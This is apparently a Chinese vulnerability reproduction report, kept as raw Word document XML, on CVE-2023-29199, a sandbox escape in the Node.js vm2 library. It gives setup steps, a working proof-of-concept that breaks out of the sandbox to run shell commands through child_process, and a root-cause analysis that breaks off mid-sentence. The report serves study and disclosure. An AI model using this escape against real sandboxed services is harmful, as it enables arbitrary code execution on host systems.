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漏洞详情信息表"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">漏洞详情信息表</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">漏洞名称：vm2 安全漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">CNNVD 编号：CNNVD-202304-1191</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">CVE 编号：CVE-2023-29199</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">厂商：个人开发者</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">危害等级：高危</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">漏洞类型：沙箱逃逸漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">收录时间：2023-04-14 00:00:00</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">更新时间：2023-04-26 00:00:00</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">vm2 是捷克 Patrik Simek 个人开发者的一个 Node.js 的高级虚拟机/沙盒。以使用列入白名单的 Node 内置模块运行不受信任的代码。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">vm2 3.9.15 版本及之前版本存在安全漏洞。攻击者利用该漏洞绕过 handleException()并泄漏未清理的主机异常，在其中主机环境中执行任意代码。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="20"/>
    <w:bookmarkStart w:id="21" w:name="系统和软件环境配置详情信息表"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">系统和软件环境配置详情信息表</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1002"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">操作系统：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1003"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Arch Linux (6.3.3-zen1-1-zen)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1002"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">软件：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1004"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">node v20.2.0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1004"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">yarn v1.22.19</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1004"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">vm2 v3.9.15</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="21"/>
    <w:bookmarkStart w:id="38" w:name="漏洞还原详细步骤"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">漏洞还原详细步骤</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="22" w:name="新建环境"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. 新建环境</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">mkdir CVE-2023-29199</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">指令新建目录用于测试。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">yarn init</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">创建新的 nodejs 项目。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">yarn add vm2@3.9.15</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">安装带有缺陷的 vm2 版本。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="22"/>
    <w:bookmarkStart w:id="23" w:name="编写代码"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. 编写代码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">假设我们将 vm2 当作沙箱来运行任意代码，在披露中我们可以使用如下方式来绕过沙箱而获得整个程序的执行权限。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">编辑</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">index.js</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">文件如下。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { VM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"vm2"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> vm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VM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> code </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">`</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">aVM2_INTERNAL_TMPNAME = {};</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">function stack() {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    new Error().stack;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    stack();</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">try {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    stack();</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">} catch (a$tmpname) {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    a$tmpname.constructor.constructor('return process')().mainModule</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        .require('child_process')</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        .execSync('echo "flag is here" &gt; flag');</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimString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(vm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">run</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(code))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="23"/>
    <w:bookmarkStart w:id="27" w:name="测试漏洞"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. 测试漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">node index.js</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">执行上面的代码之后，就可以发现当前目录下多出现了一个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">flag</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">文件，内容正好是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">flag is here</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4895850" cy="1390650"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="" title="" id="25" name="Picture"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="./figure/fig1.png" id="26" name="Picture"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeArrowheads="1" noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4895850" cy="1390650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">从上可以看出，我们成功绕过了沙箱的各种限制，拿取到了 shell 的执行权限。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="27"/>
    <w:bookmarkStart w:id="37" w:name="漏洞分析"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4. 漏洞分析</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">我们尝试理解 vm2 对于 catch 块的转译工作。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">首先 vm2 是对于 node 自带模块 vm 的一层包装，旨在提供安全的沙箱环境运行代码。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">在代码运行之前，vm2 会利用 acorn 对代码进行适当的解析，通过注入代码等方式代理 nodejs 中的一些危险操作，例如 eval 和 Function 对象等。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">但是其中的代码含有一些缺陷。例如在解析 catch 块的时候，vm2 使用了一些预占用变量</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">$tmpname</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">作为替代，之后再使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.replace(/\$tmpname/g, tmpname)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">进行统一的替换。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="3676135"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="" title="" id="29" name="Picture"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="./figure/fig2.png" id="30" name="Picture"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeArrowheads="1" noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId28"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="3676135"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">L137 代码的原意是使得 catch 捕获之后的变量经过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">handleException</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">处理之后保证不暴露出 nodejs 的原生函数。但是碍于 L121 中的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">$tmpname</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">原因，需要在最后添加含有容易被注入的全局替换语句。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="2015164"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="" title="" id="32" name="Picture"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="./figure/fig3.png" id="33" name="Picture"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeArrowheads="1" noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId31"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="2015164"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">L189 中的 replace 函数会将所有</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">$tmpname</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">都替换为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">tmpname</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">变量（默认值为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">VM2_INTERNAL_TMPNAME</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">），因此这句注入的语句会被最终展开成如下代码。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">aVM2_INTERNAL_TMPNAME</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">VM2_INTERNAL_STATE_DO_NOT_USE_OR_PROGRAM_WILL_FAIL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">handleException</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">aVM2_INTERNAL_TMPNAME</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">从而有效避免了捕获的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">a$tmpname</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">变量被替换，从而在下文中可以得到一个原生的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">InternalError</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">对象。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="1452770"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="" title="" id="35" name="Picture"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="./figure/fig4.png" id="36" name="Picture"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeArrowheads="1" noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId34"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="1452770"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">通过对这个原生的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">InternalError</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">对象获取</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.constructor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">可以获取到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">function InternalError()</w:t>
      </w:r>
      <w:r>
